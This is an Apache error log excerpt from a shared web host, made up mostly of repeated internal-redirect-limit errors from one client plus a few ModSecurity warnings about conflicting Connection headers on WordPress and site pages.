[Tue May 12 06:38:03.491069 2026] [core:error] [pid 1808852:tid 1808877] [client 172.212.136.43:32525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:04.306160 2026] [core:error] [pid 1825179:tid 1825216] [client 172.212.136.43:43406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:04.306186 2026] [core:error] [pid 1825179:tid 1825216] [client 172.212.136.43:43406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:05.497321 2026] [core:error] [pid 1808852:tid 1808857] [client 172.212.136.43:34086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:05.497355 2026] [core:error] [pid 1808852:tid 1808857] [client 172.212.136.43:34086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:06.459063 2026] [core:error] [pid 1808852:tid 1808871] [client 172.212.136.43:49389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:06.459089 2026] [core:error] [pid 1808852:tid 1808871] [client 172.212.136.43:49389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:08.339336 2026] [core:error] [pid 1842385:tid 1842392] [client 172.212.136.43:33708] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:08.339369 2026] [core:error] [pid 1842385:tid 1842392] [client 172.212.136.43:33708] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:10.128235 2026] [core:error] [pid 1820198:tid 1820200] [client 172.212.136.43:49382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:10.128259 2026] [core:error] [pid 1820198:tid 1820200] [client 172.212.136.43:49382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:10.696985 2026] [core:error] [pid 1808852:tid 1808875] [client 172.212.136.43:44395] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:10.697033 2026] [core:error] [pid 1808852:tid 1808875] [client 172.212.136.43:44395] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:11.476942 2026] [core:error] [pid 1820198:tid 1820204] [client 172.212.136.43:32562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:11.476975 2026] [core:error] [pid 1820198:tid 1820204] [client 172.212.136.43:32562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:12.592907 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:43435] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:12.592942 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:43435] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:13.656915 2026] [core:error] [pid 1820198:tid 1820224] [client 172.212.136.43:54685] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:13.656938 2026] [core:error] [pid 1820198:tid 1820224] [client 172.212.136.43:54685] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:15.242503 2026] [core:error] [pid 1844863:tid 1844877] [client 172.212.136.43:43169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:15.242529 2026] [core:error] [pid 1844863:tid 1844877] [client 172.212.136.43:43169] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:16.375848 2026] [core:error] [pid 1844863:tid 1844887] [client 172.212.136.43:11251] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:16.375877 2026] [core:error] [pid 1844863:tid 1844887] [client 172.212.136.43:11251] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:16.998973 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:43392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:16.999008 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:43392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:17.718431 2026] [core:error] [pid 1844863:tid 1844870] [client 172.212.136.43:10990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:17.718476 2026] [core:error] [pid 1844863:tid 1844870] [client 172.212.136.43:10990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:18.332885 2026] [core:error] [pid 1825287:tid 1825304] [client 172.212.136.43:43422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:18.332933 2026] [core:error] [pid 1825287:tid 1825304] [client 172.212.136.43:43422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:20.652706 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:63713] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:20.652743 2026] [core:error] [pid 1842385:tid 1842397] [client 172.212.136.43:63713] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:21.505231 2026] [core:error] [pid 1808852:tid 1808873] [client 172.212.136.43:4970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:21.505262 2026] [core:error] [pid 1808852:tid 1808873] [client 172.212.136.43:4970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:22.457446 2026] [core:error] [pid 1825287:tid 1825314] [client 172.212.136.43:49376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:22.457475 2026] [core:error] [pid 1825287:tid 1825314] [client 172.212.136.43:49376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:23.648510 2026] [core:error] [pid 1825287:tid 1825305] [client 172.212.136.43:32524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:23.648536 2026] [core:error] [pid 1825287:tid 1825305] [client 172.212.136.43:32524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:24.954922 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:32554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:24.954957 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:32554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:25.971366 2026] [core:error] [pid 1825179:tid 1825205] [client 172.212.136.43:61337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:25.971405 2026] [core:error] [pid 1825179:tid 1825205] [client 172.212.136.43:61337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:27.681323 2026] [core:error] [pid 1844863:tid 1844880] [client 172.212.136.43:10461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:27.681353 2026] [core:error] [pid 1844863:tid 1844880] [client 172.212.136.43:10461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:28.519916 2026] [core:error] [pid 1820198:tid 1820215] [client 172.212.136.43:10440] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:28.519950 2026] [core:error] [pid 1820198:tid 1820215] [client 172.212.136.43:10440] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:30.406337 2026] [core:error] [pid 1844863:tid 1844885] [client 172.212.136.43:32526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:30.406361 2026] [core:error] [pid 1844863:tid 1844885] [client 172.212.136.43:32526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:31.074366 2026] [core:error] [pid 1842385:tid 1842392] [client 172.212.136.43:61373] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:31.074404 2026] [core:error] [pid 1842385:tid 1842392] [client 172.212.136.43:61373] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:32.291155 2026] [core:error] [pid 1844863:tid 1844872] [client 172.212.136.43:61375] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:32.291192 2026] [core:error] [pid 1844863:tid 1844872] [client 172.212.136.43:61375] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:32.666025 2026] [core:error] [pid 1844863:tid 1844882] [client 172.212.136.43:48857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:32.666063 2026] [core:error] [pid 1844863:tid 1844882] [client 172.212.136.43:48857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:33.388460 2026] [core:error] [pid 1825287:tid 1825320] [client 172.212.136.43:32572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:33.388495 2026] [core:error] [pid 1825287:tid 1825320] [client 172.212.136.43:32572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:34.102248 2026] [core:error] [pid 1820198:tid 1820203] [client 172.212.136.43:63344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:34.102277 2026] [core:error] [pid 1820198:tid 1820203] [client 172.212.136.43:63344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:34.852852 2026] [core:error] [pid 1825179:tid 1825219] [client 172.212.136.43:10445] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:34.852877 2026] [core:error] [pid 1825179:tid 1825219] [client 172.212.136.43:10445] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:35.234551 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:48005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:35.234592 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:48005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:37.037796 2026] [core:error] [pid 1825179:tid 1825211] [client 172.212.136.43:29630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:37.037835 2026] [core:error] [pid 1825179:tid 1825211] [client 172.212.136.43:29630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:38.722616 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:10481] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:38.722642 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:10481] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:42.555382 2026] [core:error] [pid 1825179:tid 1825201] [client 172.212.136.43:11232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:42.555415 2026] [core:error] [pid 1825179:tid 1825201] [client 172.212.136.43:11232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:43.773423 2026] [core:error] [pid 1820198:tid 1820221] [client 172.212.136.43:10315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:43.773449 2026] [core:error] [pid 1820198:tid 1820221] [client 172.212.136.43:10315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:45.562092 2026] [core:error] [pid 1825179:tid 1825207] [client 172.212.136.43:44415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:45.562122 2026] [core:error] [pid 1825179:tid 1825207] [client 172.212.136.43:44415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:47.183335 2026] [security2:error] [pid 1820198:tid 1820202] [client 150.109.12.46:49112] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-content/uploads/2023/08/muzungu_2661bfc3-0c04-448c-a8b0-06711a3367d8_943x-150x150.webp"] [unique_id "agKu181tk6y7yBJLpJpLMQAAAII"]
[Tue May 12 06:38:47.391457 2026] [core:error] [pid 1825287:tid 1825314] [client 172.212.136.43:47498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:47.391486 2026] [core:error] [pid 1825287:tid 1825314] [client 172.212.136.43:47498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:48.282155 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:41204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:48.282184 2026] [core:error] [pid 1825179:tid 1825209] [client 172.212.136.43:41204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:48.849013 2026] [core:error] [pid 1808852:tid 1808857] [client 172.212.136.43:37666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:48.849051 2026] [core:error] [pid 1808852:tid 1808857] [client 172.212.136.43:37666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:49.480968 2026] [core:error] [pid 1808852:tid 1808876] [client 172.212.136.43:59114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:49.480993 2026] [core:error] [pid 1808852:tid 1808876] [client 172.212.136.43:59114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:50.861631 2026] [core:error] [pid 1808852:tid 1808862] [client 172.212.136.43:39480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:50.861661 2026] [core:error] [pid 1808852:tid 1808862] [client 172.212.136.43:39480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:51.431183 2026] [core:error] [pid 1825287:tid 1825322] [client 172.212.136.43:37688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:51.431215 2026] [core:error] [pid 1825287:tid 1825322] [client 172.212.136.43:37688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:51.803412 2026] [security2:error] [pid 1844863:tid 1844888] [client 150.109.46.88:54526] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/henri-modeste/"] [unique_id "agKu2_aAnTZtx1_H_wzM4gAAAVM"]
[Tue May 12 06:38:53.184199 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:37790] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:53.184227 2026] [core:error] [pid 1825179:tid 1825208] [client 172.212.136.43:37790] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:55.098461 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:37783] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:55.098490 2026] [core:error] [pid 1844863:tid 1844884] [client 172.212.136.43:37783] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:55.742118 2026] [core:error] [pid 1842385:tid 1842406] [client 172.212.136.43:39455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:55.742152 2026] [core:error] [pid 1842385:tid 1842406] [client 172.212.136.43:39455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:57.381312 2026] [core:error] [pid 1808852:tid 1808872] [client 172.212.136.43:37655] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:38:57.381346 2026] [core:error] [pid 1808852:tid 1808872] [client 172.212.136.43:37655] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:01.370307 2026] [core:error] [pid 1825179:tid 1825203] [client 172.212.136.43:37662] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:01.370332 2026] [core:error] [pid 1825179:tid 1825203] [client 172.212.136.43:37662] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:01.807212 2026] [security2:error] [pid 1842385:tid 1842408] [client 119.91.20.139:50798] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agKu5Rs7kySIUZ3ORnI7hQAAARE"]
[Tue May 12 06:39:02.575585 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:35945] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:02.575618 2026] [core:error] [pid 1808852:tid 1808865] [client 172.212.136.43:35945] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:03.116702 2026] [core:error] [pid 1825179:tid 1825212] [client 172.212.136.43:37635] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:03.116741 2026] [core:error] [pid 1825179:tid 1825212] [client 172.212.136.43:37635] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:05.002558 2026] [core:error] [pid 1808852:tid 1808858] [client 172.212.136.43:10688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:05.002601 2026] [core:error] [pid 1808852:tid 1808858] [client 172.212.136.43:10688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:05.867860 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:29707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:05.867887 2026] [core:error] [pid 1842385:tid 1842413] [client 172.212.136.43:29707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:39:06.641838 2026] [core:error] [pid 1825287:tid 1825317] [client 172.212.136.43:35924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
